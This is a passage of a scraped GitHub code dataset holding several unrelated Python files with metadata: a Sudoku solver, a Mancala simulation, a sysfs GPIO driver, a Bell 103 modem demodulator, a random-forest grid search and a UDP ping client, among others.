None\n\n if solutionOK(matrix):\n return matrix\n\n print('Searching...')\n for i in range(9):\n for j in range(9):\n if len(matrix[i][j]) > 1:\n for k in matrix[i][j]:\n mcopy = copy.deepcopy(matrix)\n mcopy[i][j] = {k}\n\n result = solve(mcopy)\n\n if result is not None:\n return result\n\n return None\n\n\ndef read_file(f):\n matrix = []\n for line in open(f):\n print(line)\n columns = []\n for col in line.rstrip('\\n').split():\n if not col.isdigit():\n columns.append(set())\n else:\n columns.append(int(col))\n matrix.append(columns)\n return matrix\n\n\ndef main():\n input_file = input('Please enter a Sudoku puzzle file name:')\n matrix = read_file(input_file)\n\n","repo_name":"dejac001/DataStructures","sub_path":"sudoku/sudoku_dfs.py","file_name":"sudoku_dfs.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"34768562504","text":"\nfrom time import sleep\nimport requests\nimport gevent\nfrom gevent.queue import Queue\nfrom gevent.pool import Pool\nfrom gevent import monkey\nmonkey.patch_socket()\n\n# put和get都有非阻塞的版本,put_nowait和get_nowait不会阻塞,然而在操作不能完成时抛出\n# gevent.queue.Empty或gevent.queue.Empty异常。\n\npool = Pool()\ntasks = Queue()\nnums = 0\n\ndef worker():\n global nums\n while nums:\n task = tasks.get()\n print(nums)\n nums -= 1\n print('Quitting time!')\n\n\ndef boss():\n # headers = {'User-Agent': 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)'}\n\n def _(url):\n # response = requests.get(url, headers=headers)\n response = requests.get(url)\n # sleep(300 / 1000)\n print(url)\n tasks.put_nowait(url)\n\n global nums\n page_url_base = 'http://www.mala.cn/forum-70-{0}.html'\n page_urls = [page_url_base.format(i) for i in range(1, 100)]\n nums = len(page_urls)\n # [pool.apply_async(_, args=(obj,)) for obj in page_urls]\n [pool.apply(_, args=(obj,)) for obj in page_urls]\n # pool.map_async(_, page_urls)\n\n\nimport time\nst = time.time()\ngevent.spawn(boss).join()\ngevent.spawn(worker).join()\nprint('total: ', time.time() - st)\n","repo_name":"Rockyzsu/StudyRepo","sub_path":"Python_Study/python基础/coroutine/gevent_queue.py","file_name":"gevent_queue.py","file_ext":"py","file_size_in_byte":1227,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"71346482287","text":"import random\nimport datetime\n\n# testing GitHub connection\n\n\n#starting menu\nprint(\"\")\nprint(\"Welcome to Mancala!\")\nprint(\"\")\n\nstartTime = datetime.datetime.now()\nprint(startTime)\nprint(\"\")\n\n# track system time??\n# maybe create a bigger wile loop starting here...\nstartCommand = input(\"Enter 'y' to run a game. Enter 'q' to QUIT.\")\n\nif startCommand == \"y\":\n playing = True\n print(\"the game has begun...\")\nelif startCommand == \"q\":\n playing = False\n print(\"You have QUIT the game.\")\nelse:\n playing = False\n print(\"Unexpected entry. The game is over.\")\n\nstartTime = datetime.datetime.now()\nprint(startTime)\nprint(\"\")\n\n\n\n#Next up...\n#\n# run through multiple games... keep track of winners\n\n# *** the game needs to be reset ***\n\n# make the random bin choice more sophisticated\n\nwinsByOne = 0\nwinsByTwo = 0\n\n\nfor gameNumber in range(100):\n moveCount = 1\n\n binAmount = [4, 4, 4, 4, 4, 4, 0, 4, 4, 4, 4, 4, 4, 0]\n\n playing = True\n\n playerOne = True\n\n messageCode = 0\n\n giveawayPile = -1\n\n lastRecipient = -1\n\n chosenBin = -1\n\n while(playing and moveCount < 101):\n\n # avoid printing\n \"\"\"\n print(\"Move number \" + str(moveCount))\n if playerOne: print(\"Player One's move...\")\n else: print(\"Player Two's move...\")\n\n message = \"\"\n if playerOne and messageCode == -2:\n message = \"Invalid input. Try again, Player One.\"\n elif not(playerOne) and messageCode == -2:\n message = \"Invalid input. Try again, Player Two.\"\n elif playerOne and messageCode == -1:\n message = \"You must choose a non-empty bin, Player One.\"\n elif not(playerOne) and messageCode == -1:\n message = \"You must choose a non-empty bin, Player Two.\"\n print(\"\")\n print(message)\n print(\"\")\n \"\"\"\n messageCode = 0\n\n i = 0\n for element in binAmount:\n binAmount[i] = int(binAmount[i])\n if int(binAmount[i]) < 10:\n binAmount[i] = \" \" + str(binAmount[i])\n else:\n binAmount[i] = str(binAmount[i])\n i = i + 1\n # end of the for loop\n\n \"\"\"\n if not(playerOne):\n print(\" a b c d e f\")\n print(\"+----+----+----+----+----+----+----+----+\")\n print(\"| | \"+ binAmount[12] +\" | \"+ binAmount[11] \n +\" | \"+ binAmount[10] +\" | \"+ binAmount[9] \n +\" | \"+ binAmount[8] +\" | \"+ binAmount[7] +\" | |\")\n print(\"| \"+ binAmount[13] +\" |----+----+----+----+----+----| \"+ binAmount[6] +\" |\")\n print(\"| | \"+ binAmount[0] +\" | \"+ binAmount[1] \n +\" | \"+ binAmount[2] +\" | \"+ binAmount[3] \n +\" | \"+ binAmount[4] +\" | \"+ binAmount[5] +\" | |\")\n print(\"+----+----+----+----+----+----+----+----+\")\n if playerOne:\n print(\" f e d c b a\")\n print(\"\")\n \"\"\"\n\n #userInput = input(\"Enter a letter to choose a bin or enter 'q' to QUIT: \")\n\n # choosing a bin at random\n userInput = random.choice([\"a\",\"b\",\"c\",\"d\",\"e\",\"f\"])\n\n if userInput == \"q\":\n playing = False\n chosenBin = 0\n elif playerOne and userInput == \"a\":\n chosenBin = 5\n elif playerOne and userInput == \"b\":\n chosenBin = 4\n elif playerOne and userInput == \"c\":\n chosenBin = 3\n elif playerOne and userInput == \"d\":\n chosenBin = 2\n elif playerOne and userInput == \"e\":\n chosenBin = 1\n elif playerOne and userInput == \"f\":\n chosenBin = 0\n elif not(playerOne) and userInput == \"a\":\n chosenBin = 12\n elif not(playerOne) and userInput == \"b\":\n chosenBin = 11\n elif not(playerOne) and userInput == \"c\":\n chosenBin = 10\n elif not(playerOne) and userInput == \"d\":\n chosenBin = 9\n elif not(playerOne) and userInput == \"e\":\n chosenBin = 8\n elif not(playerOne) and userInput == \"f\":\n chosenBin = 7\n else:\n chosenBin = -2\n messageCode = -2 # invalid input\n\n\n\n if int(chosenBin) >= 0:\n giveawayPile = binAmount[chosenBin]\n binAmount[chosenBin] = 0\n if int(giveawayPile) <= 0:\n messageCode = -1 # empty bin was chosen\n\n recipient = chosenBin + 1\n while(int(giveawayPile) > 0):\n if(playerOne and int(recipient) == 13):\n recipient = 0\n if(not(playerOne) and int(recipient) == 6):\n recipient = 7\n\n binAmount[recipient] = int(binAmount[recipient]) + 1\n giveawayPile = int(giveawayPile) - 1\n \n if int(giveawayPile) == 0:\n lastRecipient = recipient\n else:\n recipient = int(recipient) + 1\n if int(recipient) > 13:\n recipient = 0\n\n if(playerOne and int(lastRecipient) == 6):\n playerOne = True\n elif(playerOne and int(binAmount[lastRecipient]) == 1 and int(lastRecipient) < 6):\n binAmount[6] = int(binAmount[6]) + int(binAmount[lastRecipient]) + int(binAmount[12 - int(lastRecipient)])\n binAmount[lastRecipient] = 0\n binAmount[12 - int(lastRecipient)] = 0\n playerOne = not(playerOne)\n elif(not(playerOne) and int(lastRecipient) == 13):\n playerOne = False\n elif(not(playerOne) and int(binAmount[lastRecipient]) == 1 and int(lastRecipient) > 6):\n binAmount[13] = int(binAmount[13]) + int(binAmount[lastRecipient]) + int(binAmount[12 - int(lastRecipient)])\n binAmount[lastRecipient] = 0\n binAmount[12 - int(lastRecipient)] = 0\n playerOne = not(playerOne)\n elif(int(messageCode) >= 0):\n playerOne = not(playerOne)\n\n # checking for the end of the game\n sideOne = 0\n sideTwo = 0\n for j in range(6):\n sideOne = int(sideOne) + int(binAmount[j])\n sideTwo = int(sideTwo) + int(binAmount[j+7])\n\n if(int(sideOne) == 0 or int(sideTwo) == 0):\n playing = False\n binAmount[6] = int(binAmount[6]) + int(sideOne)\n binAmount[13] = int(binAmount[13]) + int(sideTwo)\n for k in range(6):\n binAmount[k] = 0\n binAmount[k+7] = 0\n\n moveCount = int(moveCount) + 1\n\n\n\n # end of the while loop\n print(\"\")\n print(\"Number of moves: \" + str(moveCount))\n print(\"The game is over!\")\n if int(binAmount[13]) < int(binAmount[6]):\n print(\"Player One has won the game!\")\n winsByOne = winsByOne + 1\n elif int(binAmount[13]) > int(binAmount[6]):\n print(\"Player Two has won the game!\")\n winsByTwo = winsByTwo + 1\n else:\n print(\"The game ended in a tie.\")\n\n i = 0\n for element in binAmount:\n binAmount[i] = int(binAmount[i])\n if int(binAmount[i]) < 10:\n binAmount[i] = \" \" + str(binAmount[i])\n else:\n binAmount[i] = str(binAmount[i])\n i = i + 1\n # end of the for loop\n\n\n t = datetime.datetime.now()\n print(\"Time: \" + str(t) + \" Game Number: \" + str(gameNumber))\n print(\"\")\n\nprint(\"\")\nprint(\"Results...\")\nprint(\"Start time: \"+str(startTime))\nprint(\"End Time: \"+str(t))\nprint(\"One: \"+str(winsByOne))\nprint(\"Two: \"+str(winsByTwo))\n\n","repo_name":"jlm2357/mancala","sub_path":"mancala_compVcomp.py","file_name":"mancala_compVcomp.py","file_ext":"py","file_size_in_byte":7456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"2"} +{"seq_id":"69814600047","text":"\"\"\"\n@Author: yanzx\n@Date: 2021-08-11 10:17:04\n@Desc: 二叉树的镜像\n\n后序遍历 交换节点\n\n\"\"\"\nfrom utils.binary_tree import create_tree, TreeNode, floor_print\n\nclass Solution:\n def mirrorTree(self, root: TreeNode) -> TreeNode:\n def dfs(root: TreeNode):\n if root is not None:\n self.mirrorTree(root.left)\n self.mirrorTree(root.right)\n root.left, root.right = root.right, root.left\n dfs(root)\n return root\n\nif __name__ == '__main__':\n nums = [4, 2, 7, 1, 3, 6, 9]\n root = create_tree(nums)\n floor_print(root)\n s = Solution()\n new_root = s.mirrorTree(root)\n print(\"*\" * 20)\n\n floor_print(new_root)\n","repo_name":"yanzhenxing123/algorithms","sub_path":"剑指offer/27. 二叉树的镜像.py","file_name":"27. 二叉树的镜像.py","file_ext":"py","file_size_in_byte":705,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"2"} +{"seq_id":"42119568545","text":"from boto3 import client\nfrom app.archive_constants import AWS_KEY_ID, AWS_SECRET_KEY, AWS_REGION\nfrom botocore.client import Config\n\nclient_sdb = client('sdb',\n region_name = AWS_REGION,\n aws_access_key_id = AWS_KEY_ID,\n aws_secret_access_key = AWS_SECRET_KEY)\n\n\ns3_client = client('s3',\n aws_access_key_id = AWS_KEY_ID,\n aws_secret_access_key = AWS_SECRET_KEY)","repo_name":"amplabs-ai/ampcloud-service","sub_path":"app/utilities/aws_connection.py","file_name":"aws_connection.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"27776311157","text":"from common.drivers.gpio import GPIODriver, GPIOMode, GPIOResistorState\n\n__all__ = ('DIRECTIONS', 'INPUT', 'OUTPUT',\n 'EDGES', 'RISING', 'FALLING', 'BOTH',\n 'Controller')\n\nimport errno\nimport os\nimport select\nimport logging\n\nLogger = logging.getLogger('sysfs.gpio')\nLogger.addHandler(logging.StreamHandler())\nLogger.setLevel(logging.DEBUG)\n\n# Sysfs constants\n\nSYSFS_BASE_PATH = '/sys/class/gpio'\n\nSYSFS_EXPORT_PATH = SYSFS_BASE_PATH + '/export'\nSYSFS_UNEXPORT_PATH = SYSFS_BASE_PATH + '/unexport'\n\nSYSFS_GPIO_PATH = SYSFS_BASE_PATH + '/gpio%d'\nSYSFS_GPIO_DIRECTION_PATH = SYSFS_GPIO_PATH + '/direction'\nSYSFS_GPIO_EDGE_PATH = SYSFS_GPIO_PATH + '/edge'\nSYSFS_GPIO_VALUE_PATH = SYSFS_GPIO_PATH + '/value'\nSYSFS_GPIO_ACTIVE_LOW_PATH = SYSFS_GPIO_PATH + '/active_low'\n\nSYSFS_GPIO_VALUE_LOW = '0'\nSYSFS_GPIO_VALUE_HIGH = '1'\n\n# Public interface\n\nINPUT = 'in'\nOUTPUT = 'out'\n\nRISING = 'rising'\nFALLING = 'falling'\nBOTH = 'both'\n\nACTIVE_LOW_ON = 1\nACTIVE_LOW_OFF = 0\n\nDIRECTIONS = (INPUT, OUTPUT)\nEDGES = (RISING, FALLING, BOTH)\nACTIVE_LOW_MODES = (ACTIVE_LOW_ON, ACTIVE_LOW_OFF)\n\n\nclass Pin(object):\n \"\"\"\n Represent a pin in SysFS\n \"\"\"\n\n def __init__(self, number, direction, callback=None, edge=None, active_low=0):\n \"\"\"\n @type number: int\n @param number: The pin number\n @type direction: int\n @param direction: Pin direction, enumerated by C{Direction}\n @type callback: callable\n @param callback: Method be called when pin changes state\n @type edge: int\n @param edge: The edge transition that triggers callback,\n enumerated by C{Edge}\n @type active_low: int\n @param active_low: Indicator of whether this pin uses inverted\n logic for HIGH-LOW transitions.\n \"\"\"\n self._number = number\n self._direction = direction\n self._callback = callback\n self._active_low = active_low\n\n self._fd = open(self._sysfs_gpio_value_path(), 'r+')\n\n if callback and not edge:\n raise Exception('You must supply a edge to trigger callback on')\n\n with open(self._sysfs_gpio_direction_path(), 'w') as fsdir:\n fsdir.write(direction)\n\n if edge:\n with open(self._sysfs_gpio_edge_path(), 'w') as fsedge:\n fsedge.write(edge)\n\n if active_low:\n if active_low not in ACTIVE_LOW_MODES:\n raise Exception('You must supply a value for active_low which is either 0 or 1.')\n with open(self._sysfs_gpio_active_low_path(), 'w') as fsactive_low:\n fsactive_low.write(str(active_low))\n\n @property\n def callback(self):\n \"\"\"\n Gets this pin callback\n \"\"\"\n return self._callback\n\n @callback.setter\n def callback(self, value):\n \"\"\"\n Sets this pin callback\n \"\"\"\n self._callback = value\n\n @property\n def direction(self):\n \"\"\"\n Pin direction\n \"\"\"\n return self._direction\n\n @property\n def number(self):\n \"\"\"\n Pin number\n \"\"\"\n return self._number\n\n @property\n def active_low(self):\n \"\"\"\n Pin number\n \"\"\"\n return self._active_low\n\n def set(self):\n \"\"\"\n Set pin to HIGH logic setLevel\n \"\"\"\n self._fd.write(SYSFS_GPIO_VALUE_HIGH)\n self._fd.seek(0)\n\n def reset(self):\n \"\"\"\n Set pin to LOW logic setLevel\n \"\"\"\n self._fd.write(SYSFS_GPIO_VALUE_LOW)\n self._fd.seek(0)\n\n def read(self):\n \"\"\"\n Read pin value\n\n @rtype: int\n @return: I{0} when LOW, I{1} when HIGH\n \"\"\"\n val = self._fd.read()\n self._fd.seek(0)\n return int(val)\n\n def fileno(self):\n \"\"\"\n Get the file descriptor associated with this pin.\n\n @rtype: int\n @return: File descriptor\n \"\"\"\n return self._fd.fileno()\n\n def changed(self, state):\n if callable(self._callback):\n self._callback(self.number, state)\n\n def _sysfs_gpio_value_path(self):\n \"\"\"\n Get the file that represent the value of this pin.\n\n @rtype: str\n @return: the path to sysfs value file\n \"\"\"\n return SYSFS_GPIO_VALUE_PATH % self.number\n\n def _sysfs_gpio_direction_path(self):\n \"\"\"\n Get the file that represent the direction of this pin.\n\n @rtype: str\n @return: the path to sysfs direction file\n \"\"\"\n return SYSFS_GPIO_DIRECTION_PATH % self.number\n\n def _sysfs_gpio_edge_path(self):\n \"\"\"\n Get the file that represent the edge that will trigger an interrupt.\n\n @rtype: str\n @return: the path to sysfs edge file\n \"\"\"\n return SYSFS_GPIO_EDGE_PATH % self.number\n\n def _sysfs_gpio_active_low_path(self):\n \"\"\"\n Get the file that represents the active_low setting for this pin.\n\n @rtype: str\n @return: the path to sysfs active_low file\n \"\"\"\n return SYSFS_GPIO_ACTIVE_LOW_PATH % self.number\n\n\nclass Controller(object):\n '''\n A singleton class to provide access to SysFS GPIO pins\n '''\n\n def __new__(cls, *args, **kw):\n if not hasattr(cls, '_instance'):\n instance = super(Controller, cls).__new__(cls)\n instance._allocated_pins = {}\n instance._poll_queue = select.epoll()\n\n instance._available_pins = []\n instance._running = True\n\n # Cleanup before stopping reactor\n # reactor.addSystemEventTrigger('before', 'shutdown', instance.stop)\n\n # Run the EPoll in a Thread, as it blocks.\n # reactor.callInThread(instance._poll_queue_loop)\n\n cls._instance = instance\n return cls._instance\n\n def __init__(self):\n self.EPOLL_TIMEOUT = 1 # second\n\n def _poll_queue_loop(self):\n pass\n # while self._running:\n # try:\n # events = self._poll_queue.poll(EPOLL_TIMEOUT)\n # except IOError as error:\n # if error.errno != errno.EINTR:\n # Logger.error(repr(error))\n # reactor.stop()\n # if len(events) > 0:\n # reactor.callFromThread(self._poll_queue_event, events)\n\n @property\n def available_pins(self):\n return self._available_pins\n\n @available_pins.setter\n def available_pins(self, value):\n self._available_pins = value\n\n def stop(self):\n self._running = False\n values = self._allocated_pins.copy().values()\n for pin in values:\n self.dealloc_pin(pin.number)\n\n def alloc_pin(self, number, direction, callback=None, edge=None, active_low=0):\n # TODO: remember which pins we exported and do unexport later\n Logger.debug('SysfsGPIO: alloc_pin(%d, %s, %s, %s, %s)'\n % (number, direction, callback, edge, active_low))\n\n self._check_pin_validity(number)\n\n if direction not in DIRECTIONS:\n raise Exception(\"Pin direction %s not in %s\"\n % (direction, DIRECTIONS))\n\n if callback and edge not in EDGES:\n raise Exception(\"Pin edge %s not in %s\" % (edge, EDGES))\n\n if not self._check_pin_already_exported(number):\n with open(SYSFS_EXPORT_PATH, 'w') as export:\n export.write('%d' % number)\n else:\n Logger.debug(\"SysfsGPIO: Pin %d already exported\" % number)\n\n pin = Pin(number, direction, callback, edge, active_low)\n\n if direction is INPUT:\n self._poll_queue_register_pin(pin)\n\n self._allocated_pins[number] = pin\n return pin\n\n def _poll_queue_register_pin(self, pin):\n ''' Pin responds to fileno(), so it's pollable. '''\n self._poll_queue.register(pin, (select.EPOLLPRI | select.EPOLLET))\n\n def _poll_queue_unregister_pin(self, pin):\n self._poll_queue.unregister(pin)\n\n def dealloc_pin(self, number):\n\n Logger.debug('SysfsGPIO: dealloc_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n with open(SYSFS_UNEXPORT_PATH, 'w') as unexport:\n unexport.write('%d' % number)\n\n pin = self._allocated_pins[number]\n\n if pin.direction is INPUT:\n self._poll_queue_unregister_pin(pin)\n\n del pin, self._allocated_pins[number]\n\n def get_pin(self, number):\n\n Logger.debug('SysfsGPIO: get_pin(%d)' % number)\n\n return self._allocated_pins[number]\n\n def set_pin(self, number):\n\n Logger.debug('SysfsGPIO: set_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n return self._allocated_pins[number].set()\n\n def reset_pin(self, number):\n\n Logger.debug('SysfsGPIO: reset_pin(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n return self._allocated_pins[number].reset()\n\n def get_pin_state(self, number):\n\n Logger.debug('SysfsGPIO: get_pin_state(%d)' % number)\n\n if number not in self._allocated_pins:\n raise Exception('Pin %d not allocated' % number)\n\n pin = self._allocated_pins[number]\n\n if pin.direction == INPUT:\n self._poll_queue_unregister_pin(pin)\n\n val = pin.read()\n\n if pin.direction == INPUT:\n self._poll_queue_register_pin(pin)\n\n if val <= 0:\n return False\n else:\n return True\n\n ''' Private Methods '''\n\n def _poll_queue_event(self, events):\n \"\"\"\n EPoll event callback\n \"\"\"\n\n for fd, event in events:\n if not (event & (select.EPOLLPRI | select.EPOLLET)):\n continue\n\n try:\n values = self._allocated_pins.itervalues()\n except AttributeError:\n values = self._allocated_pins.values()\n for pin in values:\n if pin.fileno() == fd:\n pin.changed(pin.read())\n\n def _check_pin_already_exported(self, number):\n \"\"\"\n Check if this pin was already exported on sysfs.\n\n @type number: int\n @param number: Pin number\n @rtype: bool\n @return: C{True} when it's already exported, otherwise C{False}\n \"\"\"\n gpio_path = SYSFS_GPIO_PATH % number\n return os.path.isdir(gpio_path)\n\n def _check_pin_validity(self, number):\n \"\"\"\n Check if pin number exists on this bus\n\n @type number: int\n @param number: Pin number\n @rtype: bool\n @return: C{True} when valid, otherwise C{False}\n \"\"\"\n\n if number not in self._available_pins:\n raise Exception(\"Pin number out of range\")\n\n if number in self._allocated_pins:\n raise Exception(\"Pin already allocated\")\n\n\nclass SysfsGPIODriver(GPIODriver):\n\n class SysfsChannel(GPIODriver.Channel):\n\n def __init__(self, pin: Pin):\n super().__init__()\n self.__pin = pin\n\n def write(self, state: [int, bool]):\n if state:\n self.__pin.set()\n else:\n self.__pin.reset()\n\n def mode(self):\n return GPIOMode.READ if self.__pin.direction == INPUT else GPIOMode.WRITE\n\n def set_mode(self, direction: int, resistor=GPIOResistorState.UNKNOWN):\n raise NotImplementedError()\n # if direction == GPIODriver.GPIO_MODE_READ:\n # self.__pin.direction = INPUT\n # else:\n # self.__pin.direction = OUTPUT\n\n def read(self, reverse=False) -> int:\n return self.__pin.read()\n\n def __init__(self):\n super().__init__()\n self.__gpio_controller = Controller()\n\n def on_initialized(self, application):\n self.__gpio_controller.available_pins = [1, 2, 3, 4, 6, 12] # TODO: This should be in params\n\n def new_channel(self, pin: [str, int], direction: GPIOMode,\n resistor_mode: GPIOResistorState = GPIOResistorState.PULLUP) -> SysfsChannel:\n pin = self.resolve_pin_name(pin)\n if isinstance(pin, GPIODriver.Channel):\n return pin\n pin = self.__gpio_controller.alloc_pin(pin, (INPUT if GPIOMode.READ == direction else OUTPUT))\n return SysfsGPIODriver.SysfsChannel(pin)\n\n\n","repo_name":"JointBox/jointbox","sub_path":"src/unix/sysfs/gpio.py","file_name":"gpio.py","file_ext":"py","file_size_in_byte":12532,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"17597940186","text":"import soundfile as sf\nimport numpy as np \nimport sys\nfrom math import pi\n\n\n# CONSTANTS\nWAV_DATATYPE = 'float32'\nBAUD_RATE = 300\nMARK = 1\nSPACE = 0\nMARK_FREQ = 2225 \nSPACE_FREQ = 2025 \n\n\n# Goertzel filter\nclass Goertzel:\n \n def __init__(self, sampleRate, frameSize, frequency):\n self.w0 = 2*pi*frequency/sampleRate\n self.norm = np.exp(np.complex(0, self.w0 * frameSize))\n self.coeff = np.array([np.exp(np.complex(0, -self.w0 * k)) for k in range(frameSize)])\n\n def filter(self, samples):\n assert len(samples) == len(self.coeff), \"Window size does not match number of coeffecients\"\n return self.norm * np.dot(samples, self.coeff)\n \n \n# Demodulator for answer signal from Bell 103 modem \nclass Demodulator:\n\n def __init__(self, sampleRate, frameSize):\n self.sampleRate = sampleRate\n self.frameSize = frameSize\n self.filterSpace = Goertzel(sampleRate, frameSize, SPACE_FREQ) \n self.filterMark = Goertzel(sampleRate, frameSize, MARK_FREQ) \n\n def decode(self, frame):\n markMag = abs(self.filterMark.filter(frame))\n spaceMag = abs(self.filterSpace.filter(frame))\n if markMag > spaceMag:\n return MARK\n elif spaceMag > markMag:\n return SPACE\n \n assert True, \"Ambiguous detection\"\n\n\n# flip the bits array and return ascii value as a char\ndef convertBits(bits):\n # bits are in little endian order\n bits = np.flip(bits, axis=0)\n # dot bits with power of 2 array\n asciiVal = bits.dot(np.flip(2**np.arange(bits.size), axis=0))\n return chr(asciiVal) \n\n\n# loads modulation file, reads and decodes ASCII message 1 frame at a time\ndef decode(modFile):\n # save message for return val\n message = []\n\n # load wav data and stats\n data, sampleRate = sf.read(modFile, dtype=WAV_DATATYPE)\n frameSize = sampleRate // BAUD_RATE\n print(f\"\\nStats: sample rate {sampleRate}, frame size {frameSize}\")\n\n # create decoder object\n decoder = Demodulator(sampleRate, frameSize)\n\n # init loop vars\n start = False\n cntBits = 0\n bits = []\n\n # start of message\n print(\"\\n\\\"\", end=\" \")\n\n # mimic real-time, read blocks from file like it's a buffer\n for frame in sf.blocks(modFile, blocksize = frameSize):\n\n # wait for start bit\n if start == False and decoder.decode(frame) == SPACE:\n start = True\n\n # read the byte \n elif start == True and cntBits < 8:\n bits.append(decoder.decode(frame))\n cntBits += 1\n\n elif start == True and cntBits == 8:\n # verify next bit is end bit\n assert decoder.decode(frame) == MARK, \"Stop bit not detected\"\n letter = convertBits(bits)\n print(letter, end=\" \")\n message.append(letter)\n bits = []\n cntBits = 0\n start = False\n \n # end of message \n print(\" \\\"\\n\")\n\n return message\n\n\ndef main():\n modFile = sys.argv[1]\n\n # decodes message in modulation file\n message = decode(modFile)\n\n print(\"Demodularization complete!\\n\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"MerlinPCarson/demodulation","sub_path":"demod.py","file_name":"demod.py","file_ext":"py","file_size_in_byte":3153,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"27"} +{"seq_id":"72521555273","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Wed Dec 28 01:44:37 2016\n\n@author: salem7mg\n\"\"\"\nfrom sklearn import svm, datasets, grid_search, metrics,cross_validation,tree\nfrom sklearn.ensemble import RandomForestClassifier\nfrom sklearn.externals import joblib\nfrom sklearn.cross_validation import train_test_split\n\nimport multiprocessing as mp\nimport os\nimport sys\nsys.path.append('/home/salem7mg/AzumiSanjin/Ind')\nimport time\nimport numpy as np\nimport talib\nimport main2\nfrom sklearn.grid_search import GridSearchCV \nfrom sklearn import datasets\nfrom sklearn.externals import joblib\n\nfrom MyInd import MyInd\n\nparameters = {\n 'n_estimators' : [5, 10, 20, 30, 50, 100, 300],\n 'random_state' : [0],\n 'n_jobs' : [3],\n 'min_samples_split' : [5, 10, 15],\n 'max_depth' : [3, 5, 10, 15, 20, 25, 30, 40, 50, 100]\n}\ndef IndGrid(Sybol,TimeFrame,fromx,to):\n can=np.array(MyInd.CanRead(Sybol,TimeFrame,fromx,to))\n label=main2.IndPredict(can,9,9)\n p = mp.Pool(mp.cpu_count())\n processes = []\n for i in range(len(main2.Ind)):\n #for i in range(1):\n processes.append((main2.TrVal1,Sybol,TimeFrame,i,can[:len(can)],9,9))\n p.map(main2.argwrapper,processes)\n p.close()\n processes = []\n del p\n tmpdir='/tmp/'\n\n for i in range(len(main2.Ind)): \n if not os.path.exists('/home/salem7mg/Documents/Python/'+main2.Ind[i][1]+\".txt\"): \n features=np.load(tmpdir+Sybol+TimeFrame+main2.Ind[i][1]+'.npy')\n clf = GridSearchCV(RandomForestClassifier(), parameters)\n clf.fit(features, label)\n fo = open('/home/salem7mg/Documents/Python/'+main2.Ind[i][1]+\".txt\", 'w')\n sys.stdout = fo\n print(main2.Ind[i][1]+\"best-->\",clf.best_estimator_)\n print(\"\\n+ トレーニングデータでCVした時の平均スコア:\\n\")\n for params, mean_score, all_scores in clf.grid_scores_:\n print (\"{:.3f} (+/- {:.3f}) for {}\".format(mean_score, all_scores.std() / 2, params))\n\n print (\"\\n+ テストデータでの識別結果:\\n\")\n #y_true, y_pred = y_test, clf.predict(X_test)\n #print (classification_report(y_true, y_pred))\n \"\"\" \n for j in range(i+1,len(main2.Ind)):\n fo = open('/home/salem7mg/Documents/Python/'+main2.Ind[i][1]+main2.Ind[j][1]+\"txt\", 'w')\n sys.stdout = fo\n main2.TrValx(Sybol,TimeFrame,i,j)\n features=np.load(tmpdir+Sybol+TimeFrame+main2.Ind[i][1]+main2.Ind[j][1]+'.npy') \n os.remove(tmpdir+Sybol+TimeFrame+main2.Ind[i][1]+main2.Ind[j][1]+'.npy')\n clf = GridSearchCV(RandomForestClassifier(), parameters)\n clf.fit(features, label)\n print(main2.Ind[i][1]+main2.Ind[j][1]+\"best-->\",clf.best_estimator_)\n print(\"\\n+ トレーニングデータでCVした時の平均スコア:\\n\")\n for params, mean_score, all_scores in clf.grid_scores_:\n print (\"{:.3f} (+/- {:.3f}) for {}\".format(mean_score, all_scores.std() / 2, params))\n\n print (\"\\n+ テストデータでの識別結果:\\n\")\n y_true, y_pred = y_test, clf.predict(X_test)\n print (classification_report(y_true, y_pred))\n \"\"\"\n os.remove(tmpdir+Sybol+TimeFrame+main2.Ind[i][1]+'.npy')\n sys.stdout = sys.__stdout__\n return\n \nif __name__ == '__main__':\n #IndMain2('USDJPY','10080','0','1167429600')\n #IndMain2('USDJPY','1440','0','1167429600')\n #IndMain2('USDJPY','240','0','1167429600')\n #IndMain2('USDJPY','60','0','1167429600')\n #IndGrid('USDJPY','30','0','1167429600')\n IndGrid('USDJPY','15','0','1167429600')\n #IndMain2('USDJPY','5','0','1167429600')\n #IndMain2('USDJPY','1','0','1167429600')\n\n","repo_name":"salem7mg/trade2","sub_path":"trade/trade/Ind/Grid_sesrch.py","file_name":"Grid_sesrch.py","file_ext":"py","file_size_in_byte":3811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"14204612967","text":"#! /usr/bin/env python3\n# Echo Client\nimport sys\nimport socket\nfrom timeit import default_timer as timer\nfrom struct import *\nfrom decimal import *\n\n\n# Get the server hostname, port and data length as command line arguments\nhost = sys.argv[1]\nport = int(sys.argv[2])\ncount = int(sys.argv[2])\n# Sequence number holder/counter\nsequence_num = 1 \n# Counts num. of dropped periods\ndropped_num = 0\n# Number of Pings\nnum = 10 \n#Holds sec values (Min, Max,and Average) times\nmin_rttime = 0\nmax_rttime = 0\navg_rttime = 0\n\n# Create UDP client socket. Note the use of SOCK_DGRAM\nclientsocket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n\n# Timeout function w/ 1 sec. parameter after a period of inactivity (use to mess with timeout setting)\nclientsocket.settimeout(1)\n\nprint(\"Pinging \" + str(port) + \", \" + host)\n\n# Unpack and Responds with PING or Time Out ERROR\ndef response_from(): \n global dropped_num\n global count\n global sequence_num\n global sequence_num2\n global dataEcho\n while True:\n try:\n packed_data, address = clientsocket.recvfrom(count)\n unpacked_data = unpack('!hH', packed_data)\n sequence_num = unpacked_data[1]\n return \"PING\"\n except Exception as 